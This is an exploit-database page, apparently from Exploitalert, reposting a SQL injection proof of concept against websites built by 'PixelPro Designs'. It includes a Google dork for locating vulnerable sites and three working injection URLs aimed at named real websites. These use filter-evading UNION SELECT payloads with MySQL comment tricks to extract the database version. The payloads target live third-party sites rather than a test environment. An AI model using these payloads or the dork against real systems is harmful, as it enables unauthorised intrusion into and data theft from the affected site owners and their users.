Advertisement






PixelPro Designs - Sql Injection

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2023-10-31
CVSS
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023100061

Below is a copy:

PixelPro Designs - Sql Injection
*********************************************************
#Exploit Title: PixelPro Designs - Sql Injection
#Date: 2023-10-31
#Exploit Author: Behrouz Mansoori
#Google Dork: "Developed By - PixelPro Designs"
#Category:webapps
#Tested On: Mac, Firefox
Proof of Concept:
### Demo :
https://www.betterworldcare.com.au/service_details.php?id=-9%27%20/*!12345union*/%20/*!12345select*/%201,2,3,4,5,version(),7,8,9,10,11,12,13--+

http://www.fassl.co.uk/products_details.php?id=-48%20%23sdfsdfs%0Aunion%20%23asdada%0Aselect%201,2,3,version(),5,6,7--

https://www.milllanenurseries.co.uk/gallery.php?id=-3%27%20/*!12345union*/%20select%20%201,2,3,version(),5--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.